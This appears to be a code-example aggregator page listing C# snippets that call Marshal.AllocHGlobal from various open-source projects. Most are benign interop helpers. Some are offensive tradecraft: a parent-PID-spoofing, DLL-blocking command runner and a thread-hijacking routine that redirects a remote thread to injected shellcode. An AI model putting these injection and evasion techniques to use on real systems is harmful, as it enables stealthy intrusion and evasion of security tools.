System.Runtime.InteropServices.Marshal.AllocHGlobal(int)

Here are the examples of the csharp api System.Runtime.InteropServices.Marshal.AllocHGlobal(int) taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

1968 Examples 7

19 View Source File : Program.cs
License : BSD 3-Clause "New" or "Revised" License
Project Creator : airzero24

public static string ExecuteShellCommand(int PPID, bool BlockDLLs, string Command)
        {
            var saHandles = new SECURITY_ATTRIBUTES();
            saHandles.nLength = Marshal.SizeOf(saHandles);
            saHandles.bInheritHandle = true;
            saHandles.lpSecurityDescriptor = IntPtr.Zero;

            IntPtr hStdOutRead;
            IntPtr hStdOutWrite;
            IntPtr hDupStdOutWrite = IntPtr.Zero;

            CreatePipe(
                out hStdOutRead,
                out hStdOutWrite,
                ref saHandles,
                0);

            SetHandleInformation(
                hStdOutRead,
                HANDLE_FLAGS.INHERIT,
                0);

            var pInfo = new PROCESS_INFORMATION();
            var siEx = new STARTUPINFOEX();

            siEx.StartupInfo.cb = Marshal.SizeOf(siEx);
            siEx.StartupInfo.hStdErr = hStdOutWrite;
            siEx.StartupInfo.hStdOutput = hStdOutWrite;

            string result = string.Empty;

            try
            {
                var lpSize = IntPtr.Zero;
                if (BlockDLLs)
                {
                    InitializeProcThreadAttributeList(
                        IntPtr.Zero,
                        2,
                        0,
                        ref lpSize);

                    siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);

                    InitializeProcThreadAttributeList(
                        siEx.lpAttributeList,
                        2,
                        0,
                        ref lpSize);

                    var lpMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size);
                    Marshal.WriteInt64(lpMitigationPolicy, (long)BINARY_SIGNATURE_POLICY.PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON);

                    UpdateProcThreadAttribute(
                        siEx.lpAttributeList,
                        0,
                        0x20007,
                        lpMitigationPolicy,
                        (IntPtr)IntPtr.Size,
                        IntPtr.Zero,
                        IntPtr.Zero);
                }
                else
                {
                    InitializeProcThreadAttributeList(
                        IntPtr.Zero,
                        1,
                        0,
                        ref lpSize);

                    siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);

                    InitializeProcThreadAttributeList(
                        siEx.lpAttributeList,
                        1,
                        0,
                        ref lpSize);
                }

                var parentHandle = OpenProcess(
                    0x0080 | 0x0040,
                    false,
                    PPID);

                var lpParentProcess = Marshal.AllocHGlobal(IntPtr.Size);
                Marshal.WriteIntPtr(lpParentProcess, parentHandle);

                UpdateProcThreadAttribute(
                    siEx.lpAttributeList,
                    0,
                    0x00020000,
                    lpParentProcess,
                    (IntPtr)IntPtr.Size,
                    IntPtr.Zero,
                    IntPtr.Zero);

                var hCurrent = Process.GetCurrentProcess().Handle;

                DuplicateHandle(
                    hCurrent,
                    hStdOutWrite,
                    parentHandle,
                    ref hDupStdOutWrite,
                    0,
                    true,
                    0x00000001 | 0x00000002);

                siEx.StartupInfo.hStdErr = hDupStdOutWrite;
                siEx.StartupInfo.hStdOutput = hDupStdOutWrite;

                siEx.StartupInfo.dwFlags = 0x00000001 | 0x00000100;
                siEx.StartupInfo.wShowWindow = 0;

                var ps = new SECURITY_ATTRIBUTES();
                var ts = new SECURITY_ATTRIBUTES();
                ps.nLength = Marshal.SizeOf(ps);
                ts.nLength = Marshal.SizeOf(ts);

                CreateProcess(
                    null,
                    Command,
                    ref ps,
                    ref ts,
                    true,
                    CREATION_FLAGS.CREATE_NO_WINDOW | CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT,
                    IntPtr.Zero,
                    null,
                    ref siEx,
                    out pInfo);

                var safeHandle = new SafeFileHandle(hStdOutRead, false);
                var encoding = Encoding.GetEncoding(GetConsoleOutputCP());
                var reader = new StreamReader(new FileStream(safeHandle, FileAccess.Read, 4096, false), encoding, true);

                var exit = false;

                try
                {
                    do
                    {
                        if (WaitForSingleObject(pInfo.hProcess, 100) == 0)
                            exit = true;

                        char[] buf = null;
                        int bytesRead;
                        uint bytesToRead = 0;

                        var peekRet = PeekNamedPipe(
                            hStdOutRead,
                            IntPtr.Zero,
                            IntPtr.Zero,
                            IntPtr.Zero,
                            ref bytesToRead,
                            IntPtr.Zero);

                        if (peekRet == true && bytesToRead == 0)
                            if (exit == true)
                                break;
                            else
                                continue;

                        if (bytesToRead > 4096)
                            bytesToRead = 4096;

                        buf = new char[bytesToRead];
                        bytesRead = reader.Read(buf, 0, buf.Length);
                        if (bytesRead > 0)
                            result += new string(buf);

                    } while (true);
                    reader.Close();
                }
                catch { }
                finally
                {
                    safeHandle.Close();
                }

                CloseHandle(hStdOutRead);
            }
            catch { }
            finally
            {
                DeleteProcThreadAttributeList(siEx.lpAttributeList);
                Marshal.FreeHGlobal(siEx.lpAttributeList);
                CloseHandle(pInfo.hProcess);
                CloseHandle(pInfo.hThread);
            }

            return result;
        }

19 View Source File : GvrAudio.cs
License : MIT License
Project Creator : alanplotko

public static void UpdateAudioRoom(GvrAudioRoom room, bool roomEnabled) {
    // Update the enabled rooms list.
    if (roomEnabled) {
      if (!enabledRooms.Contains(room)) {
        enabledRooms.Add(room);
      }
    } else {
      enabledRooms.Remove(room);
    }
    // Update the current room effects to be applied.
    if(initialized) {
      if (enabledRooms.Count > 0) {
        GvrAudioRoom currentRoom = enabledRooms[enabledRooms.Count - 1];
        RoomProperties roomProperties = GetRoomProperties(currentRoom);
        // Preplaced the room properties into a pointer.
        IntPtr roomPropertiesPtr = Marshal.AllocHGlobal(Marshal.SizeOf(roomProperties));
        Marshal.StructureToPtr(roomProperties, roomPropertiesPtr, false);
        SetRoomProperties(roomPropertiesPtr);
        Marshal.FreeHGlobal(roomPropertiesPtr);
      } else {
        // Set the room properties to null, which will effectively disable the room effects.
        SetRoomProperties(IntPtr.Zero);
      }
    }
  }

19 View Source File : NativeMethods.cs
License : GNU General Public License v2.0
Project Creator : ADeltaX

public static bool TryStartService(string svcName)
		{
			bool wasDisabled = false;
			QUERY_SERVICE_CONFIG SvcConfig = new QUERY_SERVICE_CONFIG();
			IntPtr hSvcMgr = OpenSCManager(null, null, SC_MANAGER_CONNECT);
			IntPtr hSvc = OpenService(hSvcMgr, "TrustedInstaller",
				SERVICE_CHANGE_CONFIG | SERVICE_QUERY_CONFIG | SERVICE_START);
			// Check if the service was disabled
			uint dummy = 0;
			IntPtr ptr = Marshal.AllocHGlobal(4096);
			if (!QueryServiceConfig(hSvc, ptr, 4096, out dummy)) return false;
			Marshal.PtrToStructure(ptr, SvcConfig);
			Marshal.FreeHGlobal(ptr);
			wasDisabled = (SvcConfig.dwStartType == SvcStartupType.Disabled);
			// If it was disabled, set it as manual temporary
			if (wasDisabled)
			{
				if (!ChangeServiceConfig(hSvc, SERVICE_NO_CHANGE,
					SvcStartupType.Manual, SERVICE_NO_CHANGE, 
					null, null, IntPtr.Zero, null, null, null, null)) return false;
			}
			// Start the service
			StartService(hSvc, 0, null);
			// If it was disabled, set it back to disabled
			if (wasDisabled)
			{
				if (!ChangeServiceConfig(hSvc, SERVICE_NO_CHANGE,
					SvcStartupType.Disabled, SERVICE_NO_CHANGE,
					null, null, IntPtr.Zero, null, null, null, null)) return false;
			}
			// Clean up
			CloseServiceHandle(hSvc);
			CloseServiceHandle(hSvcMgr);
			return true;
		}

19 View Source File : TcpEngine.cs
License : GNU General Public License v3.0
Project Creator : aiportal

private static IEnumerable<MIB_TCP6ROW_OWNER_PID> EnumTcpConnectionsV6()
		{
			int dwSize = sizeof(int) + Marshal.SizeOf(typeof(MIB_TCP6ROW_OWNER_PID)) * 100;
			IntPtr hTcpTable = IntPtr.Zero;
			{
				hTcpTable = Marshal.AllocHGlobal(dwSize);
				int ret = iphlpapi.GetExtendedTcpTable(hTcpTable, ref dwSize, true, util.AF_INET6, TCP_TABLE_CLreplaced.TCP_TABLE_OWNER_PID_CONNECTIONS, 0);
				if (ret != util.NO_ERROR)
				{
					// retry for new dwSize.
					Marshal.FreeHGlobal(hTcpTable);
					hTcpTable = Marshal.AllocHGlobal(dwSize);
					ret = iphlpapi.GetExtendedTcpTable(hTcpTable, ref dwSize, true, util.AF_INET6, TCP_TABLE_CLreplaced.TCP_TABLE_OWNER_PID_CONNECTIONS, 0);
					if (ret != util.NO_ERROR)
					{
						Marshal.FreeHGlobal(hTcpTable);
						throw new Exception("GetExtendedTcpTable return: " + ret);
					}
				}
			}
			{
				MIB_TCP6ROW_OWNER_PID item = new MIB_TCP6ROW_OWNER_PID();
				int dwNumEntries = Marshal.ReadInt32(hTcpTable);
				IntPtr pItem = new IntPtr(hTcpTable.ToInt32() + sizeof(int));
				for (int i = 0; i < dwNumEntries; ++i)
				{
					//var item = (MIB_TCP6ROW_OWNER_PID)Marshal.PtrToStructure(pItem, typeof(MIB_TCP6ROW_OWNER_PID));
					Marshal.PtrToStructure(pItem, item);
					pItem = new IntPtr(pItem.ToInt64() + Marshal.SizeOf(typeof(MIB_TCP6ROW_OWNER_PID)));
					yield return item;
				}
				Marshal.FreeHGlobal(hTcpTable);
			}
		}

19 View Source File : UnmanagedBuffer.cs
License : Apache License 2.0
Project Creator : aequabit

private bool Alloc(int cb)
        {
            try
            {
                if (cb > this.Size)
                {
                    this.Pointer = (this.Pointer == IntPtr.Zero) ? Marshal.AllocHGlobal(cb) : Marshal.ReAllocHGlobal(this.Pointer, new IntPtr(cb));
                    this.Size = cb;
                }
                return true;
            }
            catch (Exception exception)
            {
                return this.SetLastError(exception);
            }
        }

19 View Source File : FileHandle.cs
License : MIT License
Project Creator : action-bi-toolkit

private static string GetTypeFromHandle(SafeGenericHandle handle)
        {
            uint length;
            NativeMethods.NtQueryObject(handle,
                OBJECT_INFORMATION_CLreplaced.ObjectTypeInformation,
                IntPtr.Zero,
                0,
                out length);

            IntPtr ptr = IntPtr.Zero;
            try
            {
                try
                {
                }
                finally
                {
                    ptr = Marshal.AllocHGlobal((int)length);
                }

                if (NativeMethods.NtQueryObject(handle,
                    OBJECT_INFORMATION_CLreplaced.ObjectTypeInformation,
                    ptr,
                    length,
                    out length) != NTSTATUS.STATUS_SUCCESS)
                {
                    return null;
                }

                var typeInformation =
                    (PUBLIC_OBJECT_TYPE_INFORMATION)
                        Marshal.PtrToStructure(ptr, typeof(PUBLIC_OBJECT_TYPE_INFORMATION));
                return typeInformation.TypeName.ToString();
            }
            finally
            {
                Marshal.FreeHGlobal(ptr);
            }
        }

19 View Source File : HijackThread.cs
License : MIT License
Project Creator : Akaion

public void CallFunction(CallDescriptor callDescriptor)
        {
            var completionFlagBuffer = _memory.AllocateBlock(IntPtr.Zero, sizeof(bool), ProtectionType.ReadWrite);

            // Write the shellcode used to perform the function call into a buffer

            var shellcode = replacedembleShellcode(callDescriptor, completionFlagBuffer);

            var shellcodeBuffer = _memory.AllocateBlock(IntPtr.Zero, shellcode.Length, ProtectionType.ReadWrite);

            _memory.WriteBlock(shellcodeBuffer, shellcode);

            _memory.ProtectBlock(shellcodeBuffer, shellcode.Length, ProtectionType.ExecuteRead);

            // Open a handle to the first thread

            var firstThreadHandle = Kernel32.OpenThread(AccessMask.SpecificRightsAll | AccessMask.StandardRightsAll, false, _process.Threads[0].Id);

            if (firstThreadHandle.IsInvalid)
            {
                throw new Win32Exception($"Failed to call OpenThread with error code {Marshal.GetLastWin32Error()}");
            }

            if (callDescriptor.IsWow64Call)
            {
                // Suspend the thread

                if (Kernel32.Wow64SuspendThread(firstThreadHandle) == -1)
                {
                    throw new Win32Exception($"Failed to call Wow64SuspendThread with error code {Marshal.GetLastWin32Error()}");
                }

                // Get the context of the thread

                var threadContext = new Wow64Context {ContextFlags = Wow64ContextFlags.Control};

                if (!Kernel32.Wow64GetThreadContext(firstThreadHandle, ref threadContext))
                {
                    throw new Win32Exception($"Failed to call Wow64GetThreadContext with error code {Marshal.GetLastWin32Error()}");
                }

                // Write the original instruction pointer of the thread into the top of its stack

                threadContext.Esp -= sizeof(int);

                _memory.Write((IntPtr) threadContext.Esp, threadContext.Eip);

                // Overwrite the instruction pointer of the thread with the address of the shellcode

                threadContext.Eip = (int) shellcodeBuffer;

                // Update the context of the thread

                if (!Kernel32.Wow64SetThreadContext(firstThreadHandle, ref threadContext))
                {
                    throw new Win32Exception($"Failed to call Wow64SetThreadContext with error code {Marshal.GetLastWin32Error()}");
                }
            }

            else
            {
                // Suspend the thread

                if (Kernel32.SuspendThread(firstThreadHandle) == -1)
                {
                    throw new Win32Exception($"Failed to call SuspendThread with error code {Marshal.GetLastWin32Error()}");
                }

                // Get the context of the thread

                var threadContext = new Context {ContextFlags = ContextFlags.Control};

                var threadContextBuffer = Marshal.AllocHGlobal(Unsafe.SizeOf<Context>());

                Marshal.StructureToPtr(threadContext, threadContextBuffer, false);

                if (!Kernel32.GetThreadContext(firstThreadHandle, threadContextBuffer))
                {
                    throw new Win32Exception($"Failed to call GetThreadContext with error code {Marshal.GetLastWin32Error()}");
                }

                threadContext = Marshal.PtrToStructure<Context>(threadContextBuffer);

                // Write the original instruction pointer of the thread into the top of its stack

                threadContext.Rsp -= sizeof(long);

                _memory.Write((IntPtr) threadContext.Rsp, threadContext.Rip);

                // Overwrite the instruction pointer of the thread with the address of the shellcode

                threadContext.Rip = (long) shellcodeBuffer;

                Marshal.StructureToPtr(threadContext, threadContextBuffer, false);

                // Update the context of the thread

                if (!Kernel32.SetThreadContext(firstThreadHandle, threadContextBuffer))
                {
                    throw new Win32Exception($"Failed to call SetThreadContext with error code {Marshal.GetLastWin32Error()}");
                }

                Marshal.FreeHGlobal(threadContextBuffer);
            }

            // Send a message to the thread to ensure it executes the shellcode

            if (!User32.PostThreadMessage(_process.Threads[0].Id, MessageType.Null, IntPtr.Zero, IntPtr.Zero))
            {
                throw new Win32Exception($"Failed to call PostThreadMessage with error code {Marshal.GetLastWin32Error()}");
            }

            // Resume the thread

            if (Kernel32.ResumeThread(firstThreadHandle) == -1)
            {
                throw new Win32Exception($"Failed to call ResumeThread with error code {Marshal.GetLastWin32Error()}");
            }

            while (!_memory.Read<bool>(completionFlagBuffer))
            {
                Thread.Sleep(1);
            }

            firstThreadHandle.Dispose();

            _memory.FreeBlock(shellcodeBuffer);

            _memory.FreeBlock(completionFlagBuffer);
        }

19 View Source File : DellSmbiosSmi.cs
License : GNU General Public License v3.0
Project Creator : AaronKelley

private static byte[] StructToByteArray(SmiObject message)
        {
            int size = Marshal.SizeOf(message);
            byte[] array = new byte[size];

            IntPtr pointer = Marshal.AllocHGlobal(size);
            Marshal.StructureToPtr(message, pointer, true);
            Marshal.Copy(pointer, array, 0, size);
            Marshal.FreeHGlobal(pointer);
            return array;
        }

19 View Source File : StructHelper.cs
License : MIT License
Project Creator : albyho

public static T BytesToStuct<T>(byte[] bytes) where T : struct
        {
            Type type = typeof(T);
            //得到结构体的大小
            Int32 size = Marshal.SizeOf(type);
            //byte数组长度小于结构体的大小
            if (size > bytes.Length)
            {
                throw new ArgumentException("bytes 的长度不足", nameof(bytes));
                //返回空
                //return default(T);
            }
            //分配结构体大小的内存空间
            IntPtr structPtr = Marshal.AllocHGlobal(size);
            //将byte数组拷到分配好的内存空间
            Marshal.Copy(bytes, 0, structPtr, size);
            //将内存空间转换为目标结构体
            object obj = Marshal.PtrToStructure(structPtr, type);
            //释放内存空间
            Marshal.FreeHGlobal(structPtr);
            //返回结构体
            return (T)obj;
        }

19 View Source File : OVRNetwork.cs
License : MIT License
Project Creator : absurd-joy

public byte[] ToBytes()
		{
			int size = Marshal.SizeOf(this);
			Trace.replacedert(size == StructSize);

			byte[] arr = new byte[size];

			IntPtr ptr = Marshal.AllocHGlobal(size);
			Marshal.StructureToPtr(this, ptr, true);
			Marshal.Copy(ptr, arr, 0, size);
			Marshal.FreeHGlobal(ptr);
			return arr;
		}

19 View Source File : AccessPolicy.cs
License : GNU General Public License v3.0
Project Creator : aiportal

private IEnumerable<MIB_TCP6ROW_OWNER_PID> EnumTcpConnectionsV6()
		{
			int dwSize = sizeof(int) + Marshal.SizeOf(typeof(MIB_TCP6ROW_OWNER_PID)) * 100;
			IntPtr hTcpTable = IntPtr.Zero;
			{
				hTcpTable = Marshal.AllocHGlobal(dwSize);
				int ret = iphlpapi.GetExtendedTcpTable(hTcpTable, ref dwSize, true, util.AF_INET6, TCP_TABLE_CLreplaced.TCP_TABLE_OWNER_PID_CONNECTIONS, 0);
				if (ret != util.NO_ERROR)
				{
					// retry for new dwSize.
					Marshal.FreeHGlobal(hTcpTable);
					hTcpTable = Marshal.AllocHGlobal(dwSize);
					ret = iphlpapi.GetExtendedTcpTable(hTcpTable, ref dwSize, true, util.AF_INET6, TCP_TABLE_CLreplaced.TCP_TABLE_OWNER_PID_CONNECTIONS, 0);
					if (ret != util.NO_ERROR)
					{
						Marshal.FreeHGlobal(hTcpTable);
						throw new Exception("GetExtendedTcpTable return: " + ret);
					}
				}
			}
			{
				MIB_TCP6ROW_OWNER_PID item = new MIB_TCP6ROW_OWNER_PID();
				int dwNumEntries = Marshal.ReadInt32(hTcpTable);
				IntPtr pItem = new IntPtr(hTcpTable.ToInt32() + sizeof(int));
				for (int i = 0; i < dwNumEntries; ++i)
				{
					//var item = (MIB_TCP6ROW_OWNER_PID)Marshal.PtrToStructure(pItem, typeof(MIB_TCP6ROW_OWNER_PID));
					Marshal.PtrToStructure(pItem, item);
					pItem = new IntPtr(pItem.ToInt64() + Marshal.SizeOf(typeof(MIB_TCP6ROW_OWNER_PID)));
					yield return item;
				}
				Marshal.FreeHGlobal(hTcpTable);
			}
		}

19 View Source File : DispoIntPtr.cs
License : Mozilla Public License 2.0
Project Creator : agebullhu

public static DispoIntPtr Alloc(int size)
        {
            return new DispoIntPtr(Marshal.AllocHGlobal(size));
        }

19 View Source File : PowerManager.cs
License : MIT License
Project Creator : ABTSoftware

private static string GetPowerPlanName(Guid guid)
        {
            string name = string.Empty;
            IntPtr lpszName = (IntPtr)null;
            uint dwSize = 0;

            PowerReadFriendlyName((IntPtr)null, ref guid, (IntPtr)null, (IntPtr)null, lpszName, ref dwSize);
            if (dwSize > 0)
            {
                lpszName = Marshal.AllocHGlobal((int)dwSize);
                if (0 == PowerReadFriendlyName((IntPtr)null, ref guid, (IntPtr)null, (IntPtr)null, lpszName, ref dwSize))
                {
                    name = Marshal.PtrToStringUni(lpszName);
                }
                if (lpszName != IntPtr.Zero)
                    Marshal.FreeHGlobal(lpszName);
            }

            return name;
        }

19 View Source File : Scanner.cs
License : Apache License 2.0
Project Creator : airbus-cert

public virtual List<ScanResult> ScanMemory(
            ref byte[] buffer,
            int length,
            CompiledRules rules,
            YR_SCAN_FLAGS flags)
        {
            var results = new List<ScanResult>();
            GCHandleHandler resultsHandle = new GCHandleHandler(results);

            IntPtr btCpy = Marshal.AllocHGlobal(buffer.Length); ;
            Marshal.Copy(buffer, 0, btCpy, (int)buffer.Length);

            ErrorUtility.ThrowOnError(
                Methods.yr_rules_scan_mem(
                    rules.BasePtr,
                    btCpy,
                    (ulong)length,
                    (int)flags,
                    callbackPtr,
                    resultsHandle.GetPointer(),
                    YR_TIMEOUT));

            return results;
        }

19 View Source File : DellSmbiosBzh.cs
License : GNU General Public License v3.0
Project Creator : AaronKelley

private static bool RemoveDriver()
        {
            IntPtr serviceManagerHandle;
            IntPtr serviceHandle;
            bool result;

            StopDriver();

            serviceManagerHandle = ServiceMethods.OpenSCManager(null, null, ServiceAccess.ServiceManagerAllAccess);

            if (serviceManagerHandle == IntPtr.Zero)
            {
                return false;
            }

            serviceHandle = ServiceMethods.OpenService(serviceManagerHandle, DriverName, ServiceAccess.AllAccess);
            ServiceMethods.CloseServiceHandle(serviceManagerHandle);

            if (serviceManagerHandle == IntPtr.Zero)
            {
                return false;
            }

            result = ServiceMethods.QueryServiceConfig(serviceHandle, IntPtr.Zero, 0, out int bytesNeeded);

            if ((ErrorCode)Marshal.GetLastWin32Error() == ErrorCode.InsufficientBuffer)
            {
                IntPtr serviceConfigurationPtr = Marshal.AllocHGlobal(bytesNeeded);

                result = ServiceMethods.QueryServiceConfig(serviceHandle, serviceConfigurationPtr, bytesNeeded, out _);
                QueryServiceConfig serviceConfiguration = (QueryServiceConfig) Marshal.PtrToStructure(serviceConfigurationPtr, typeof(QueryServiceConfig));

                if (!result)
                {
                    Marshal.FreeHGlobal(serviceConfigurationPtr);
                    ServiceMethods.CloseServiceHandle(serviceHandle);
                    return result;
                }

                // If service is set to load automatically, don't delete it!
                if (serviceConfigurationPtr != IntPtr.Zero && serviceConfiguration.startType == ServiceStartType.DemandStart)
                {
                    result = ServiceMethods.DeleteService(serviceHandle);
                }

                Marshal.FreeHGlobal(serviceConfigurationPtr);
            }

            ServiceMethods.CloseServiceHandle(serviceHandle);

            return result;
        }

19 View Source File : MemoryManager.cs
License : MIT License
Project Creator : Akaion

internal byte[] ReadVirtualMemory(IntPtr baseAddress, int bytesToRead)
        {
            var bytesBuffer = Marshal.AllocHGlobal(bytesToRead);
            
            if (!ReadProcessMemory(_processHandle, baseAddress, bytesBuffer, bytesToRead, IntPtr.Zero))
            {
                ExceptionHandler.ThrowWin32Exception("Failed to read from a region of virtual memory in the remote process");
            }
            
            var bytesRead = new byte[bytesToRead];
            
            Marshal.Copy(bytesBuffer, bytesRead, 0, bytesToRead);
            
            Marshal.FreeHGlobal(bytesBuffer);

            return bytesRead;
        }

19 View Source File : AcrylicBlur.cs
License : MIT License
Project Creator : ADeltaX

public void EnableBlur()
        {
            var accent = new AccentPolicy
            {
                AccentFlags = (0x20 | 0x40 | 0x80 | 0x100),
                AccentState = AccentState.ACCENT_ENABLE_ACRYLICBLURBEHIND,
                GradientColor = (_blurOpacity << 24) | (_blurBackgroundColor & 0xFFFFFF)
            };

            var accentStructSize = Marshal.SizeOf(accent);

            var accentPtr = Marshal.AllocHGlobal(accentStructSize);
            Marshal.StructureToPtr(accent, accentPtr, false);

            var data = new WindowCompositionAttributeData
            {
                Attribute = WindowCompositionAttribute.WCA_ACCENT_POLICY,
                SizeOfData = accentStructSize,
                Data = accentPtr
            };

            SetWindowCompositionAttribute(WindowHandle, ref data);

            Marshal.FreeHGlobal(accentPtr);
        }

19 View Source File : UnmanagedCollection.cs
License : MIT License
Project Creator : Alan-FGR

[MethodImpl(MethodImplOptions.AggressiveInlining)]
    private void GrowMemoryBlock(int newElementCount)
    {
        var newDataSize = elementSize_ * newElementCount;
        var newData = (T*)Marshal.AllocHGlobal(newDataSize);
        Buffer.MemoryCopy(Data, newData, DataSizeInBytes, DataSizeInBytes);
        Marshal.FreeHGlobal((IntPtr)Data);
        dataSizeInElements_ = newElementCount;
        Data = newData;
    }

19 View Source File : AesGcm.cs
License : GNU General Public License v3.0
Project Creator : 0xfd3

private IntPtr ImportKey(IntPtr hAlg, byte[] key, out IntPtr hKey)
        {
            byte[] objLength = GetProperty(hAlg, BCrypt.BCRYPT_OBJECT_LENGTH);

            int keyDataSize = BitConverter.ToInt32(objLength, 0);

            IntPtr keyDataBuffer = Marshal.AllocHGlobal(keyDataSize);

            byte[] keyBlob = Concat(BCrypt.BCRYPT_KEY_DATA_BLOB_MAGIC, BitConverter.GetBytes(0x1), BitConverter.GetBytes(key.Length), key);

            uint status = BCrypt.BCryptImportKey(hAlg, IntPtr.Zero, BCrypt.BCRYPT_KEY_DATA_BLOB, out hKey, keyDataBuffer, keyDataSize, keyBlob, keyBlob.Length, 0x0);

            if (status != BCrypt.ERROR_SUCCESS)
                throw new CryptographicException(string.Format("BCrypt.BCryptImportKey() failed with status code:{0}", status));

            return keyDataBuffer;
        }

19 View Source File : StructHelper.cs
License : MIT License
Project Creator : albyho

public static byte[] StructToBytes<T>(T structObj) where T : struct
        {
            //得到结构体的大小
            Int32 size = Marshal.SizeOf(structObj);
            //创建byte数组
            var bytes = new byte[size];
            //分配结构体大小的内存空间
            IntPtr structPtr = Marshal.AllocHGlobal(size);
            //将结构体拷到分配好的内存空间
            Marshal.StructureToPtr(structObj, structPtr, false);
            //从内存空间拷到byte数组
            Marshal.Copy(structPtr, bytes, 0, size);
            //释放内存空间
            Marshal.FreeHGlobal(structPtr);
            //返回byte数组
            return bytes;
        }

19 View Source File : DarksVMStack.cs
License : GNU General Public License v3.0
Project Creator : Aekras1a

public IntPtr Localloc(uint guardPos, uint size)
        {
            var node = new LocallocNode
            {
                GuardPos = guardPos,
                Memory = Marshal.AllocHGlobal((int) size)
            };
            var insert = localPool;
            while(insert != null)
            {
                if(insert.Next == null || insert.Next.GuardPos < guardPos)
                    break;
                insert = insert.Next;
            }
            if(insert == null)
            {
                localPool = node;
            }
            else
            {
                node.Next = insert.Next;
                insert.Next = node;
            }
            return node.Memory;
        }

19 View Source File : DiscordRPC.cs
License : GNU General Public License v3.0
Project Creator : aelariane

private IntPtr StrToPtr(string input)
            {
                if (string.IsNullOrEmpty(input))
                {
                    return IntPtr.Zero;
                }

                var convbytecnt = Encoding.UTF8.GetByteCount(input);
                var buffer = Marshal.AllocHGlobal(convbytecnt + 1);
                for (int i = 0; i < convbytecnt + 1; i++)
                {
                    Marshal.WriteByte(buffer, i, 0);
                }
                _buffers.Add(buffer);
                Marshal.Copy(Encoding.UTF8.GetBytes(input), 0, buffer, convbytecnt);
                return buffer;
            }

19 View Source File : AreaForm.cs
License : MIT License
Project Creator : 1CM69

public static Cursor LoadEmbeddedCursor(byte[] cursorResource, int imageIndex = 0)
            {
                var resourceHandle = GCHandle.Alloc(cursorResource, GCHandleType.Pinned);
                var iconImage = IntPtr.Zero;
                var cursorHandle = IntPtr.Zero;

                try
                {
                    var header = (IconHeader)Marshal.PtrToStructure(resourceHandle.AddrOfPinnedObject(), typeof(IconHeader));

                    if (imageIndex >= header.count)
                        throw new ArgumentOutOfRangeException("imageIndex");

                    var iconInfoPtr = resourceHandle.AddrOfPinnedObject() + Marshal.SizeOf(typeof(IconHeader)) + imageIndex * Marshal.SizeOf(typeof(IconInfo));
                    var info = (IconInfo)Marshal.PtrToStructure(iconInfoPtr, typeof(IconInfo));

                    iconImage = Marshal.AllocHGlobal(info.size + 4);
                    Marshal.WriteInt16(iconImage + 0, info.hotspot_x);
                    Marshal.WriteInt16(iconImage + 2, info.hotspot_y);
                    Marshal.Copy(cursorResource, info.offset, iconImage + 4, info.size);

                    cursorHandle = NativeMethods.CreateIconFromResource(iconImage, info.size + 4, false, 0x30000);
                    return new Cursor(cursorHandle);
                }
                finally
                {
                    if (cursorHandle != IntPtr.Zero)
                        NativeMethods.DestroyIcon(cursorHandle);

                    if (iconImage != IntPtr.Zero)
                        Marshal.FreeHGlobal(iconImage);

                    if (resourceHandle.IsAllocated)
                        resourceHandle.Free();
                }
            }

19 View Source File : utils.cs
License : GNU General Public License v3.0
Project Creator : Aeroblast

public static T GetStructBE<T>(byte[] data, int offset)
        {
            int size = Marshal.SizeOf(typeof(T));
            Byte[] data_trimed = SubArray(data, offset, size);
            Array.Reverse(data_trimed);
            IntPtr structPtr = Marshal.AllocHGlobal(size);
            Marshal.Copy(data_trimed, 0, structPtr, size);
            T r = (T)Marshal.PtrToStructure(structPtr, typeof(T));
            Marshal.FreeHGlobal(structPtr);
            return r;
        }

19 View Source File : OVRCommon.cs
License : MIT License
Project Creator : absurd-joy

private void Reallocate(int numBytes)
	{
		Release();

		if (numBytes > 0)
		{
			m_ptr = Marshal.AllocHGlobal(numBytes);
			m_numBytes = numBytes;
		}
		else
		{
			m_ptr = IntPtr.Zero;
			m_numBytes = 0;
		}
	}

19 View Source File : AccessPolicy.cs
License : GNU General Public License v3.0
Project Creator : aiportal

private IEnumerable<MIB_TCPROW_OWNER_PID> EnumTcpConnectionsV4()
		{
			int dwSize = sizeof(int) + Marshal.SizeOf(typeof(MIB_TCPROW_OWNER_PID)) * 100;
			IntPtr hTcpTable = IntPtr.Zero;
			{
				hTcpTable = Marshal.AllocHGlobal(dwSize);
				int ret = iphlpapi.GetExtendedTcpTable(hTcpTable, ref dwSize, true, util.AF_INET, TCP_TABLE_CLreplaced.TCP_TABLE_OWNER_PID_CONNECTIONS, 0);
				if (ret != util.NO_ERROR)
				{
					// retry for new dwSize.
					Marshal.FreeHGlobal(hTcpTable);
					hTcpTable = Marshal.AllocHGlobal(dwSize);
					ret = iphlpapi.GetExtendedTcpTable(hTcpTable, ref dwSize, true, util.AF_INET, TCP_TABLE_CLreplaced.TCP_TABLE_OWNER_PID_CONNECTIONS, 0);
					if (ret != util.NO_ERROR)
					{
						Marshal.FreeHGlobal(hTcpTable);
						throw new Exception("GetExtendedTcpTable return: " + ret);
					}
				}
			}
			{
				MIB_TCPROW_OWNER_PID item = new MIB_TCPROW_OWNER_PID();
				int dwNumEntries = Marshal.ReadInt32(hTcpTable);
				IntPtr pItem = new IntPtr(hTcpTable.ToInt32() + sizeof(int));
				for (int i = 0; i < dwNumEntries; ++i)
				{
					//var item = (MIB_TCPROW_OWNER_PID)Marshal.PtrToStructure(pItem, typeof(MIB_TCPROW_OWNER_PID));
					Marshal.PtrToStructure(pItem, item);
					pItem = new IntPtr(pItem.ToInt64() + Marshal.SizeOf(typeof(MIB_TCPROW_OWNER_PID)));
					yield return item;
				}
				Marshal.FreeHGlobal(hTcpTable);
			}
		}

19 View Source File : CustomAudioSinkSample.cs
License : MIT License
Project Creator : AgoraIO

private void PullAudioFrameThread()
        {
            var avsync_type = 0;
            var bytesPerSample = 2;
            var type = AUDIO_FRAME_TYPE.FRAME_TYPE_PCM16;
            var channels = CHANNEL;
            var samples = SAMPLE_RATE / PULL_FREQ_PER_SEC * CHANNEL;
            var samplesPerSec = SAMPLE_RATE;
            var buffer = Marshal.AllocHGlobal(samples * bytesPerSample);
            var freq = 1000 / PULL_FREQ_PER_SEC;

            var tic = new TimeSpan(DateTime.Now.Ticks);

            while (_pullAudioFrameThreadSignal)
            {
